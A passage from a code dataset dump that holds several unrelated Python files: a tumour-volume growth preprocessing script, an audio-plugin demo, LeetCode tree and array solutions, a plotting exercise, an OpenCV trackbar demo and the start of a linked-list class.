pat]\n\n # get unique timestamps\n curr_timestamps = curr_data[\"Timestamp\"]\n curr_timestamps = list(curr_timestamps)\n\n unique_timestamps = np.unique(list(curr_timestamps))\n unique_timestamps = sort_timestamps(unique_timestamps)\n\n # get earliest timestamp with non-NaN or non-zero volume\n for t in unique_timestamps:\n tmp = curr_data[curr_data[\"Timestamp\"] == t]\n curr_v = np.array(tmp[\"Volume\"]).astype(\"float32\")\n curr_v = sum(curr_v)\n if (curr_v != 0) and not pd.isnull(curr_v):\n break\n init_timestamp = t\n # print(\"final timestamp (and size):\", init_timestamp, curr_v)\n\n # get last timestamp with non-NaN volume\n for t in unique_timestamps[::-1]: # reversed ordered timestamp list\n tmp = curr_data[curr_data[\"Timestamp\"] == t]\n curr_v = np.array(tmp[\"Volume\"]).astype(\"float32\")\n curr_v = sum(curr_v)\n if (curr_v != 0) and not pd.isnull(curr_v):\n break\n last_timestamp = t\n\n # get date of first timestamp of patient (T1 might not be the earliest!! If T1 is NaN or 0, then T2 might be...\n first_timestamp_date = curr_data[curr_data[\"Timestamp\"] == init_timestamp][\"Date\"]\n first_timestamp_date = str2datetime(np.asarray(first_timestamp_date)[0])\n\n # get last timestamp\n last_timestamp_date = curr_data[curr_data[\"Timestamp\"] == last_timestamp][\"Date\"]\n last_timestamp_date = str2datetime(np.asarray(last_timestamp_date)[0])\n\n # get initial volume size at first scan\n initial_volume = curr_data[curr_data[\"Timestamp\"] == init_timestamp][\"Volume\"]\n initial_volume = np.asarray(initial_volume)[0]\n\n # get final volume size at last scan\n last_volume = curr_data[curr_data[\"Timestamp\"] == last_timestamp][\"Volume\"]\n last_volume = np.asarray(last_volume)[0]\n\n # get relative volume change\n relative_volume_change = (last_volume - initial_volume) / initial_volume\n\n # get cluster numbers for current patient (if above 1, multifocal \"by definition\")\n multifocality = int(np.any(curr_data[\"Clusters total\"] > 1))\n clusters_total = max(curr_data[\"Clusters total\"])\n\n # counter number of timestamps\n # nb_timestamps = len(curr_data[\"Timestamp\"])\n nb_timestamps = len(unique_timestamps)\n\n # for each time stamp, all clusters and sum these into one value (total tumor amount in ml)\n for timestamp in unique_timestamps:\n # get volume for current timestamp - if mulitple, sum these (total tumor volume)\n times = curr_data[curr_data[\"Timestamp\"] == timestamp]\n tmp = np.nan_to_num(times[\"Volume\"]) # convert 0 to NaN for summation\n curr_volume = sum(list(tmp))\n\n # get current date for timestamp - if multiple, select the first (should have save date for the same tumors in the same timestamp)\n curr_dates = times[\"Date\"]\n curr_dates = np.asarray(curr_dates)\n curr_date = curr_dates[0]\n\n # check if earliest timestamp, store categorical value\n earliest_timestamp = int(timestamp == init_timestamp)\n\n # translate current date to datetime format\n curr_date = str2datetime(curr_date)\n\n data.append([pat, timestamp, relative_volume_change, clusters_total, multifocality, earliest_timestamp,\n nb_timestamps, initial_volume, last_volume, first_timestamp_date,\n last_timestamp_date, curr_date, curr_volume])\n iter += 1\n\n data = np.array(data)\n\n # merge this with the cohort volumes quality stuff\n full_data = pd.DataFrame()\n\n full_data[\"Patient\"] = data[:, 0]\n full_data[\"Timestamp\"] = data[:, 1]\n full_data[\"Volume\"] = data[:, -1].astype(\"float32\")\n full_data[\"Date\"] = data[:, -2]\n full_data[\"Last_Timestamp_Date\"] = data[:, -3]\n full_data[\"First_Timestamp_Date\"] = data[:, -4]\n full_data[\"Final_Volume\"] = data[:, -5].astype(\"float32\")\n full_data[\"Initial_Volume\"] = data[:, -6].astype(\"float32\")\n full_data[\"Number_Of_Timestamps\"] = data[:, -7].astype(\"float32\")\n full_data[\"Earliest_Timestamp\"] = data[:, -8]\n full_data[\"Multifocality\"] = data[:, -9]\n full_data[\"Clusters_total\"] = data[:, -10]\n full_data[\"Relative_Volume_Change\"] = data[:, -11].astype(\"float32\")\n\n unique_patients = np.asarray(full_data[\"Patient\"].drop_duplicates())\n print(\"Number of unique patients in full_data:\", len(unique_patients))\n\n # initialize NaN rows in pandas dataframe for Volume data, which will be added\n full_data[\"Dim1\"] = (np.nan * np.ones(full_data.shape[0]))\n full_data[\"Dim2\"] = (np.nan * np.ones(full_data.shape[0]))\n full_data[\"Dim3\"] = (np.nan * np.ones(full_data.shape[0]))\n full_data[\"Spacing1\"] = (np.nan * np.ones(full_data.shape[0]))\n full_data[\"Spacing2\"] = (np.nan * np.ones(full_data.shape[0]))\n full_data[\"Spacing3\"] = (np.nan * np.ones(full_data.shape[0]))\n \n # cannot simply stitch the two data arrays side by side, I will need to query\n # the (Patient, Timestamp) pairs\n for i in tqdm(range(full_data.shape[0]), \"Adding Quality info\"):\n curr_row = full_data.loc[i]\n \n curr_pat = str(curr_row[\"Patient\"])\n curr_timestamp = str(curr_row[\"Timestamp\"])\n\n filter_ = (filtered_cohort_volumes_quality[\"Patient\"] == curr_pat) & (filtered_cohort_volumes_quality[\"Timestamp\"] == curr_timestamp)\n\n if sum(filter_) != 1:\n print(sum(filter_))\n raise ValueError(\"More than one pat,ts pair matches between the two CSV files! Something is wrong!\")\n\n # query Volumes dataframe to find the patient + Timestamp pair\n row_id = np.where(filter_)[0][0]\n full_data.loc[i, \"Dim1\"] = filtered_cohort_volumes_quality.loc[row_id, \"Dim1\"]\n full_data.loc[i, \"Dim2\"] = filtered_cohort_volumes_quality.loc[row_id, \"Dim2\"]\n full_data.loc[i, \"Dim3\"] = filtered_cohort_volumes_quality.loc[row_id, \"Dim3\"]\n full_data.loc[i, \"Spacing1\"] = filtered_cohort_volumes_quality.loc[row_id, \"Spacing1\"]\n full_data.loc[i, \"Spacing2\"] = filtered_cohort_volumes_quality.loc[row_id, \"Spacing2\"]\n full_data.loc[i, \"Spacing3\"] = filtered_cohort_volumes_quality.loc[row_id, \"Spacing3\"]\n\n # add patient characteristics to full data frame\n full_data[\"Birth_Year\"] = (np.nan * np.ones(full_data.shape[0]))\n full_data[\"Gender\"] = (np.nan * np.ones(full_data.shape[0]))\n for pat, gender, byear in tqdm(zip(cohort_personal_info_filtered[\"Patient\"], cohort_personal_info_filtered[\"Gender\"],\n cohort_personal_info_filtered[\"Birth_Year\"]), \"Adding patient info\", total=len(cohort_personal_info_filtered[\"Patient\"])):\n row_ids = np.where(full_data[\"Patient\"] == pat)[0]\n for r in row_ids:\n byear_new_format = str(byear) + \"-07-01\"\n byear_new_format = str2datetime(byear_new_format)\n\n full_data.loc[r, 'Birth_Year'] = byear_new_format\n full_data.loc[r, 'Gender'] = gender\n \n # convert gender to binary dummy variable (0: woman, 1: man), but keep old gender variable\n full_data[\"Gender_bin\"] = full_data[\"Gender\"].copy()\n full_data[\"Gender_bin\"].replace([\"woman\", \"man\"], [0, 1], inplace=True)\n\n # add T2 and oedema information to full data frame\n full_data[\"T2\"] = (np.nan * np.ones(full_data.shape[0]))\n full_data[\"Oedema\"] = (np.nan * np.ones(full_data.shape[0]))\n for patient in tqdm(filtered_t2_oedema[\"Patient\"], \"Adding T2 and Oedema info\"):\n row_ids = np.where(full_data[\"Patient\"] == patient)[0]\n curr = filtered_t2_oedema[filtered_t2_oedema[\"Patient\"] == patient]\n for r in row_ids:\n full_data.loc[r, \"T2\"] = np.array(curr[\"T2\"])\n full_data.loc[r, \"Oedema\"] = np.array(curr[\"peritumorial_oedema\"])\n\n # add scanner info to the full data frame\n full_data[\"Manufacturer\"] = (np.nan * np.ones(full_data.shape[0])).astype(str)\n full_data[\"Model_Name\"] = (np.nan * np.ones(full_data.shape[0])).astype(str)\n full_data[\"Tesla\"] = (np.nan * np.ones(full_data.shape[0]))\n for i in tqdm(range(len(scanner_info)), \"Adding scanner info\"):\n patient, timestamp, manufacturer, model_name, tesla = scanner_info.loc[i]\n row_id = np.where((full_data[\"Patient\"] == patient) & (full_data[\"Timestamp\"] == timestamp))[0]\n\n if len(row_id) == 0:\n continue\n\n full_data.loc[row_id[0], \"Manufacturer\"] = manufacturer\n full_data.loc[row_id[0], \"Model_Name\"] = model_name\n full_data.loc[row_id[0], \"Tesla\"] = float(tesla)\n \n unique_patients = np.asarray(full_data[\"Patient\"].drop_duplicates())\n print(\"Number of unique patients in full_data before removing Volume=0:\", len(unique_patients))\n\n # need to filter NaN volumes on merged data frame\n # remove all occurences where Volumes=0 (not possible -> tumor was not annotated)\n full_data_nonzero = full_data[full_data.Volume != 0]\n\n unique_patients = np.asarray(full_data_nonzero[\"Patient\"].drop_duplicates())\n print(\"Number of unique patients in full_data_nonzero AFTER removing Volume=0:\", len(unique_patients))\n\n # after filtering, we need to reset indices in full_data to go 0:1:N\n full_data_nonzero.index = list(range(len(full_data_nonzero)))\n\n # remove all occurences where Volumes=0 (not possible -> tumor was not annotated)\n #filter_zero_volumes = full_data[\"Volume\"] != str(0.0)\n #full_data_nonzero = full_data[filter_zero_volumes]\n\n # get current age at scan and add to data frame\n curr_age_at_scan = full_data_nonzero[\"Date\"] - full_data_nonzero[\"Birth_Year\"]\n curr_age_at_scan = curr_age_at_scan.dt.days\n full_data_nonzero[\"Current_Age\"] = curr_age_at_scan.astype(float)\n full_data_nonzero[\"Current_Age_Years\"] = np.array(full_data_nonzero[\"Current_Age\"]).astype(\"float32\") / 365.25\n\n # get age at initial/earliest scan\n full_data_nonzero[\"Initial_Age\"] = (np.nan * np.ones(full_data_nonzero.shape[0]))\n unique_patients = np.asarray(full_data_nonzero[\"Patient\"].drop_duplicates())\n for pat in tqdm(unique_patients, \"Adding initial age info\"):\n curr_pat_filter = full_data_nonzero[\"Patient\"] == pat\n curr = full_data_nonzero[curr_pat_filter]\n curr_row = np.where(np.array(curr[\"Earliest_Timestamp\"]) == 1)[0]\n initial_age = float(curr.iloc[curr_row][\"Current_Age_Years\"])\n \n full_data_nonzero.loc[curr_pat_filter, \"Initial_Age\"] = initial_age\n\n # get relative difference in days between scans\n relative_difference_between_scans = full_data_nonzero[\"Date\"] - full_data_nonzero[\"First_Timestamp_Date\"]\n relative_difference_between_scans = relative_difference_between_scans.dt.days\n full_data_nonzero[\"Relative_Days_Difference\"] = relative_difference_between_scans.astype(\"float32\")\n full_data_nonzero[\"Follow_Up_Months\"] = relative_difference_between_scans.astype(\"float32\") / 30\n\n # get relative volume ratios between scans\n relative_volume_ratio = full_data_nonzero[\"Volume\"] / full_data_nonzero[\"Initial_Volume\"]\n full_data_nonzero[\"Relative_Volume_Ratio\"] = relative_volume_ratio.astype(\"float32\")\n\n # filter patients that show no growth? - how to determine if tumor has grown?\n # Look at first and last timestep volume size?\n volume_change = full_data_nonzero[\"Final_Volume\"] - full_data_nonzero[\"Initial_Volume\"]\n\n # remove patients with slice thickness higher or equal than X\n # slice_thickness_filter = np.array(full_data_nonzero[\"Spacing3\"]) < 2\n # full_data_nonzero = full_data_nonzero[slice_thickness_filter]\n\n # remove patients with less than 3 timestamps\n timestamp_lengths = []\n for patient in np.unique(full_data_nonzero[\"Patient\"]):\n curr_patient_data = full_data_nonzero[full_data_nonzero[\"Patient\"] == patient]\n timestamps = curr_patient_data[\"Timestamp\"]\n timestamp_lengths.append(len(timestamps))\n print(np.unique(timestamp_lengths, return_counts=True))\n print(\"-> All current patients have >= 3 timestamps with tumour volume > 0\")\n\n # create summary statistics for study - Table 1\n\n # patient_filter_ = full_data_nonzero[\"Timestamp\"] == \"T1\"\n # @TODO: After removing volumes with 0 size, some T1 points are now missing (FIXED BELOW)\n patient_filter_ = np.array(full_data_nonzero[\"Earliest_Timestamp\"]) == 1\n\n # multifocality\n multifocality = np.array(full_data_nonzero[\"Multifocality\"][patient_filter_])\n Clusters_total = np.array(full_data_nonzero[\"Clusters_total\"][patient_filter_])\n\n # age_at_T1 = np.array(full_data_nonzero[\"Current_Age\"][patient_filter_]).astype(\"float32\") / 365.25\n genders = np.array(full_data_nonzero[\"Gender\"][patient_filter_])\n\n # init_volume_size = np.array(full_data_nonzero[\"Volume\"][patient_filter_])\n number_of_mri_scans = np.array(full_data_nonzero[\"Number_Of_Timestamps\"][patient_filter_])\n slice_thickness = np.array(full_data_nonzero[\"Spacing3\"][patient_filter_])\n\n t2_hyperintense_orig = full_data_nonzero[\"T2\"][patient_filter_]\n t2_hyperintense = t2_hyperintense_orig.replace('nan', np.nan)\n t2_hyperintense = np.asarray(t2_hyperintense.dropna()).astype(int)\n\n oedema_orig = full_data_nonzero[\"Oedema\"][patient_filter_]\n oedema = oedema_orig.replace('nan', np.nan)\n oedema = np.asarray(oedema.dropna()).astype(int)\n\n earliest_timestamp_filter = np.array(full_data_nonzero[\"Earliest_Timestamp\"] == 1)\n init_volume_size = np.array(full_data_nonzero[\"Volume\"][earliest_timestamp_filter])\n age_at_T1 = np.array(full_data_nonzero[\"Current_Age\"][earliest_timestamp_filter]).astype(\"float32\") / 365.25\n\n patients = np.unique(full_data_nonzero[\"Patient\"])\n total_follow_up_days = []\n for patient in patients:\n curr = full_data_nonzero[full_data_nonzero[\"Patient\"] == patient][\"Relative_Days_Difference\"]\n total_follow_up_days.append(max(curr))\n total_follow_up_months = np.array(total_follow_up_days) / 30\n\n # @TODO: Which threshold to use? Base it on measurements error (largest error, quantiles?) in\n # inter-rater variability study? 15 % makes sense as it corresponds to the largest error in the inter-rater study\n relative_growth_threshold = 0.15\n\n full_data_nonzero_grew_only = full_data_nonzero.copy()\n volume_change = []\n volume_change_relative = []\n volume_grew = []\n volume_shrank = []\n volume_no_change = []\n volume_change_categorical = []\n grow_patients = []\n for patient in patients:\n curr = full_data_nonzero[full_data_nonzero[\"Patient\"] == patient]\n first_timestamp = get_earliest_timestamp(curr[\"Timestamp\"])\n last_timestamp = get_last_timestamp(curr[\"Timestamp\"])\n initial_size = np.array(curr[curr[\"Timestamp\"] == first_timestamp][\"Volume\"])[0]\n final_size = np.array(curr[curr[\"Timestamp\"] == last_timestamp][\"Volume\"])[0]\n\n relative_change = (final_size - initial_size) / initial_size\n initial_size = float(initial_size)\n final_size = float(final_size)\n volume_change.append(final_size - initial_size)\n volume_change_relative.append(relative_change)\n\n if relative_change > relative_growth_threshold:\n volume_change_categorical.append(1)\n volume_grew.append([patient, initial_size, relative_change])\n elif relative_change < - relative_growth_threshold:\n volume_change_categorical.append(-1)\n volume_shrank.append([patient, initial_size, relative_change])\n else:\n volume_change_categorical.append(0)\n volume_no_change.append([patient, initial_size, relative_change])\n\n volume_change = np.array(volume_change)\n volume_change_relative = np.array(volume_change_relative)\n\n # get yearly growth\n yearly_growth = np.array(volume_change_relative) / (np.array(total_follow_up_days) / 356.25)\n\n N = len(age_at_T1)\n print(\"total number of patients:\", len(age_at_T1))\n print(\"age: median/IQR/min/max:\", np.round(np.median(age_at_T1), 1), np.round(stats.iqr(age_at_T1), 1),\n np.round(np.min(age_at_T1), 1), np.round(np.max(age_at_T1), 1))\n print(\"gender (women count/%):\", sum(genders == \"woman\"), np.mean(genders == \"woman\"))\n print(\"initial volume size at T1: (median/IQR/min/max):\", np.round(np.median(init_volume_size), 1),\n np.round(stats.iqr(init_volume_size), 1), np.round(np.min(init_volume_size), 1),\n np.round(np.max(init_volume_size), 1))\n print(\"number of MRI scans per patient: (median/IQR/min/max):\", np.round(np.median(number_of_mri_scans), 1),\n np.round(stats.iqr(number_of_mri_scans), 1), np.round(np.min(number_of_mri_scans), 1),\n np.round(np.max(number_of_mri_scans), 1))\n print(\"total follow up in months: (median/IQR/min/max):\", np.round(np.median(total_follow_up_months), 1),\n np.round(stats.iqr(total_follow_up_months), 1), np.round(np.min(total_follow_up_months), 1),\n np.round(np.max(total_follow_up_months), 1))\n print(\"volume change (T1 to T-last): (median/IQR/min/max):\", np.round(np.median(volume_change), 1),\n np.round(stats.iqr(volume_change), 1), np.round(np.min(volume_change), 1),\n np.round(np.max(volume_change), 1))\n print(\"relative volume change (T1 to T-last): (median/IQR/min/max):\", np.round(np.median(volume_change_relative), 3),\n np.round(stats.iqr(volume_change_relative), 3), np.round(np.min(volume_change_relative), 3),\n np.round(np.max(volume_change_relative), 3))\n print(\"yearly relative growth (T1 to T-last): (median/IQR/min/max):\",\n np.round(np.median(yearly_growth), 3),\n np.round(stats.iqr(yearly_growth), 3), np.round(np.min(yearly_growth), 3),\n np.round(np.max(yearly_growth), 3))\n print(\"number of patients with tumors that grew/no change/shrank:\",\n len(volume_grew), len(volume_no_change), len(volume_shrank), \"| % |\",\n np.round(len(volume_grew) / N, 3),\n np.round(len(volume_no_change) / N, 3),\n np.round(len(volume_shrank) / N, 3))\n print(\"slice thickness: (median/IQR/min/max):\",\n np.round(np.median(slice_thickness), 3),\n np.round(stats.iqr(slice_thickness), 3), np.round(np.min(slice_thickness), 3),\n np.round(np.max(slice_thickness), 3))\n print(\"multifocality (count + %):\", sum(multifocality), sum(multifocality) / len(multifocality))\n print(\"clusters total: (median/IQR/min/max):\",\n np.round(np.median(Clusters_total), 3),\n np.round(stats.iqr(Clusters_total), 3), np.round(np.min(Clusters_total), 3),\n np.round(np.max(Clusters_total), 3))\n print(\"Manufacturer (count + %):\", np.unique(full_data_nonzero[\"Manufacturer\"], return_counts=True),\n np.unique(full_data_nonzero[\"Manufacturer\"], return_counts=True)[1] / len(full_data_nonzero))\n print(\"Model_Name (count + %):\", np.unique(full_data_nonzero[\"Model_Name\"], return_counts=True),\n np.unique(full_data_nonzero[\"Model_Name\"], return_counts=True)[1] / len(full_data_nonzero))\n print(\"Tesla (count + %):\", np.unique(full_data_nonzero[\"Tesla\"], return_counts=True),\n np.unique(full_data_nonzero[\"Tesla\"], return_counts=True)[1] / len(full_data_nonzero))\n\n # T2 hyperintense signal - calculate summary statistics\n tmp = np.unique(t2_hyperintense, return_counts=True)\n print(\"T2 hyperintense signal (counts for 1/2/3 categories):\",\n tmp, tmp[1] / len(t2_hyperintense))\n tmp = np.unique(oedema, return_counts=True)\n print(\"Oedema (counts for 0/1 categories):\",\n tmp, tmp[1] / len(oedema))\n\n # create temporary dataframe to store data relevant for statistical analysis\n df_association = pd.DataFrame({\n \"volume_change\": volume_change,\n \"volume_change_relative\": volume_change_relative,\n \"init_volume_size\": init_volume_size,\n \"age_at_T1\": age_at_T1,\n \"total_follow_up_months\": total_follow_up_months,\n \"T2\": t2_hyperintense_orig.astype(\"float32\"),\n \"oedema\": oedema_orig.astype(\"float32\"),\n \"genders\": genders,\n \"Spacing3\": slice_thickness,\n \"Multifocality\": multifocality,\n \"yearly_growth\": yearly_growth,\n \"volume_change_categorical\": volume_change_categorical,\n })\n\n # remove rows with missing values\n if remove_missing:\n # remove Model_Name from dataframe for convenience\n before = full_data_nonzero.shape\n full_data_nonzero = full_data_nonzero.drop(\"Model_Name\", axis=1)\n full_data_nonzero = full_data_nonzero.drop(\"Manufacturer\", axis=1)\n full_data_nonzero = full_data_nonzero.replace(\"nan\", np.nan)\n full_data_nonzero = full_data_nonzero.dropna()\n full_data_nonzero.index = list(range(len(full_data_nonzero)))\n print(\"DataFrame shape before/after dropna() + remove Model_Name + Manufacturer column:\", before, full_data_nonzero.shape)\n \n # remove rows/patients with multifocal tumors\n if remove_multifocal:\n before = full_data_nonzero.shape\n full_data_nonzero = full_data_nonzero[full_data_nonzero[\"Multifocality\"] == 0] # ignore 1 -> multifocal tumor occured in patient\n print(\"Dataframe shape before/after removing multifocal tumors:\", before, full_data_nonzero.shape)\n\n # save processed data frame as CSV on disk\n if export_csv:\n full_data_nonzero.to_csv(os.path.join(\n data_path, \"fused_dataset_growth_analysis_remove-surgery_\" + \\\n str(remove_surgery) + \"_remove-missing_\" + str(remove_missing) + \\\n \"_remove_multifocal_\" + str(remove_multifocal) + \".csv\")\n )\n\n\nif __name__ == \"__main__\":\n parser = ArgumentParser()\n parser.add_argument(\"-rs\", \"--remove-surgery\", action='store_true',\n help=\"Whether to remove patients that had surgery.\")\n parser.add_argument(\"-ex\", \"--export-csv\", action='store_true',\n help=\"Whether to export generated tables as CSVs.\")\n parser.add_argument(\"-rm\", \"--remove-missing\", action=\"store_true\",\n help=\"Whether to remove missing values or not before exporting CSV.\")\n parser.add_argument(\"-rf\", \"--remove-multifocal\", action=\"store_true\",\n help=\"Whether to remove patients with multifocal tumors before exporting CSV.\")\n args = parser.parse_args()\n print(\"arguments:\", args)\n\n data_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"../../data/\")\n \n if not os.path.isdir(data_path):\n raise ValueError(\"data/ directory was not found. Please, ensure that the data/ directory is placed at the same level as src/.\")\n\n preprocess(\n data_path=data_path,\n remove_surgery=args.remove_surgery,\n export_csv=args.export_csv,\n remove_missing=args.remove_missing,\n remove_multifocal=args.remove_multifocal\n )\n\n margins_of_error(data_path=data_path)\n\n print(\"Finished!\")\n","repo_name":"andreped/tumor-growth","sub_path":"src/python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":26187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13492119241","text":"from pedalboard import Pedalboard, Reverb, load_plugin\nfrom pedalboard.io import AudioFile\nimport time\n\nstart = time.time()\n\n# Let's upload an existing third-party plugin (VST3)\nvst = load_plugin(\"/Library/Audio/Plug-Ins/VST3/Auburn Sounds Graillon 2.vst3\")\n\n# Now we print the parameters possessed by the plugins\nprint(vst.parameters.keys())\n\n# We change the 'pitch_shift_st' parameter so that we have a voice gender transformation. Check it out!\nvst.pitch_shift_st = 3.84\n\n# Let's add a stock reverb plugin to the effects chain\nboard = Pedalboard([vst, Reverb()])\n\n# Let's open an audio file and apply our board\nwith AudioFile('media/input_file.wav', 'r') as f:\n audio = f.read(f.frames)\n samplerate = f.samplerate\n\neffected = board(audio, samplerate)\n\n# Write the audio back as a wav file:\nwith AudioFile('media/output_file.wav', 'w', samplerate, effected.shape[0]) as f:\n f.write(effected)\n\nend = time.time()\ntotal_time = end - start\nprint(\"\\nTime elapsed: \" + str(total_time) + \" seconds\")\n","repo_name":"Robooze/pedalboard_tut","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1437137010","text":"# https://leetcode.com/contest/weekly-contest-302/problems/query-kth-smallest-trimmed-number/\nclass Solution:\n def smallestTrimmedNumbers(self, nums: List[str], queries: List[List[int]]) -> List[int]:\n N = len(nums)\n M = len(nums[0])\n sortedNumsOfLen = [ [] for _ in range(M) ]\n for t in range(M):\n for i,s in enumerate(nums):\n v = int(s[~t:])\n sortedNumsOfLen[t] += [ (v,i) ]\n sortedNumsOfLen[t].sort()\n\n ans = []\n for k,t in queries:\n x,i = sortedNumsOfLen[t-1][k-1]\n ans += [i]\n return ans\n","repo_name":"henryliuser/hliu-cp","sub_path":"leetcode/medium/query_kth_smallest_trimmed_number.py","file_name":"query_kth_smallest_trimmed_number.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"3527256428","text":"\r\nimport cv2\r\nimport numpy as np\r\n\r\n\r\ncap = cv2.VideoCapture(\"video/4.mp4\")\r\n\r\n# Create trackbar\r\nxPos = 0\r\nyPos = 0\r\nradius = 20\r\nthickness = 1\r\ndef myCallBackFunctionOne(val):\r\n global xPos\r\n print(\"xPos : \", val)\r\n xPos = val\r\n \r\n\r\ndef myCallBackFunctionTwo(val):\r\n global yPos\r\n print(\"yPos : \", val)\r\n yPos = val\r\n\r\n\r\ndef myCallBackFunctionThree(val):\r\n global radius\r\n print(\"radius : \", radius)\r\n radius = val\r\n\r\n\r\ndef myCallBackFunctionFour(val):\r\n global thickness\r\n print(\"Thickness : \", thickness)\r\n thickness = val\r\n \r\n\r\nwidth = 640\r\ncv2.namedWindow(\"newTrackbars\")\r\ncv2.resizeWindow(\"newTrackbars\", 400, 150)\r\ncv2.moveWindow(\"newTrackbars\", width , 0)\r\ncv2.createTrackbar(\"xPos\", \"newTrackbars\", xPos, 640, myCallBackFunctionOne)\r\ncv2.createTrackbar(\"yPos\", \"newTrackbars\", yPos, 400, myCallBackFunctionTwo)\r\ncv2.createTrackbar(\"radius\", \"newTrackbars\", radius, 100, myCallBackFunctionThree)\r\ncv2.createTrackbar(\"thickness\", \"newTrackbars\", thickness, 6, myCallBackFunctionFour)\r\n\r\nwhile True:\r\n ret, frame = cap.read()\r\n frame = cv2.resize(frame, (640, 400))\r\n if(thickness == 0):\r\n thickness = -1\r\n cv2.circle(frame, (xPos, yPos), radius, (255, 100, 100), thickness)\r\n\r\n cv2.imshow(\"frame\", frame)\r\n if(cv2.waitKey(1) & 0xff == ord('f')):\r\n break\r\n\r\ncap.release()\r\ncv2.destroyAllWindows()\r\n","repo_name":"aadarshraj4321/Computer-Vision","sub_path":"basic_operations/basic_operations_with_video_and_webcam/creating_and_using_trackbars_openCV.py","file_name":"creating_and_using_trackbars_openCV.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"44259080223","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nmean,sigma=8,1.5\n\n# input feature 1 using normal distribution\nx1 = abs(np.random.normal(mean, sigma, 20))\n\n# input feature 2 using normal distribution\nx2 = abs(np.random.normal(mean, sigma, 20))\n\nx = np.c_[x1, x2]\ny = [np.random.binomial(100, 0.6, 20)]\n\ndata_set = pd.DataFrame()\n\n# defining the columns of the dataset\ndata_set['col1'] = x1\ndata_set['col2'] = x2\n\n# 2D Projection of Dataset\nplt.subplot(121)\nplt.title('X1 Input Feature VS Y Output Feature', fontsize='small')\nplt.scatter(y, x1, color='r', label='col1')\nplt.xlabel('y')\nplt.ylabel('x1')\n\nplt.subplot(122)\nplt.title('X2 Input Feature VS Y Output Feature', fontsize='small')\nplt.scatter(y, x2, color='b', label='col2')\nplt.xlabel('y')\nplt.ylabel('x2')\n\n\n# 3D Projection of Dataset\nfig = plt.figure()\nax = plt.axes(projection='3d')\nax.scatter3D(x1, x2, y, c=y, cmap='hot_r')\nax.set_title('3D Projection of Dataset')\nax.set_xlabel('x1')\nax.set_ylabel('x2')\nax.set_zlabel('y')\n\nplt.show()","repo_name":"tomarviii88/ITIT-4103-2021","sub_path":"Assignment-1/Assignment1a.py","file_name":"Assignment1a.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22800657195","text":"# Problem Description\n# Given a binary tree, return the Postorder traversal of its nodes values.\n# NOTE: Using recursion is not allowed.\n#\n# Problem Constraints\n# 1 <= number of nodes <= 105\n#\n# Input Format\n# First and only argument is root node of the binary tree, A.\n#\n# Output Format\n# Return an integer array denoting the Postorder traversal of the given binary tree.\n#\n# Example Input\n# Input 1:\n#\n# 1\n# \\\n# 2\n# /\n# 3\n# Input 2:\n#\n# 1\n# / \\\n# 6 2\n# /\n# 3\n#\n#\n# Example Output\n# Output 1: [3, 2, 1]\n# Output 2: [6, 3, 2, 1]\n#\n# Example Explanation\n# Explanation 1: The Preoder Traversal of the given tree is [3, 2, 1].\n# Explanation 2: The Preoder Traversal of the given tree is [6, 3, 2, 1].\n\n# Definition for a binary tree node\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n # @param A : root node of tree\n # @return a list of integers\n def postorderTraversal_app1(self, A):\n stack = []\n ans = []\n while stack or A is not None:\n if A is not None:\n # append all left value in stack\n stack.append(A)\n A = A.left\n else:\n if stack[-1].right is not None:\n # if A has right child\n A = stack[-1].right\n else:\n # if A has no right child\n element = stack.pop()\n ans.append(element.val)\n\n while stack and stack[-1].right is element:\n # if pending stack items has no right child\n element = stack.pop()\n ans.append(element.val)\n return ans\n\n # Approach#2:-\n def postorderTraversal_app2(self, A):\n stack = [A]\n ans = []\n while stack:\n top = stack.pop()\n ans.append(top.val)\n if top.left:\n stack.append(top.left)\n if top.right:\n stack.append(top.right)\n return ans[::-1]\n\n# Observation/Approach followed:-\n#\n# Recursive call would look something like this :\n#\n# postorderprint(root->left);\n# postorderprint(root->right);\n# print(root->val);\n#\n# Instead of calling the functions, we can put the nodes on a stack and process them\n","repo_name":"Abhilash-du/daily-coding-challenges","sub_path":"DataStructures/Trees/PostOrderTraversal.py","file_name":"PostOrderTraversal.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74118604073","text":"from typing import Optional\n\n\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\n# https://leetcode.com/problems/recover-a-tree-from-preorder-traversal/discuss/274621/JavaC%2B%2BPython-Iterative-Stack-Solution\nclass Solution:\n def recoverFromPreorder(self, traversal: str) -> Optional[TreeNode]:\n stack = []\n index = 0\n\n while index < len(traversal):\n level = 0\n val = ''\n\n while index < len(traversal) and traversal[index] == '-':\n level += 1\n index += 1\n\n while index < len(traversal) and traversal[index] != '-':\n val += traversal[index]\n index += 1\n\n while len(stack) > level:\n stack.pop()\n\n node = TreeNode(int(val))\n\n if stack and stack[-1].left is None:\n stack[-1].left = node\n elif stack:\n stack[-1].right = node\n\n stack.append(node)\n\n return stack[0]\n","repo_name":"cabulous/leetcode","sub_path":"python/1028.py","file_name":"1028.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7063124146","text":"class Node:\r\n #constructor to initialise the node\r\n def __init__(self, v = None):\r\n self.value = v\r\n self.next = None\r\n\r\nclass LinkedList(Node):\r\n #constructor to initialise a Linked List i.e head node is NULL\r\n def __init__(self):\r\n self.head = None\r\n \r\n #method/function to check if the linked list is empty or not\r\n def isEmpty(self):\r\n if (self.head == None):\r\n return True\r\n return False\r\n\r\n #method to add a node at 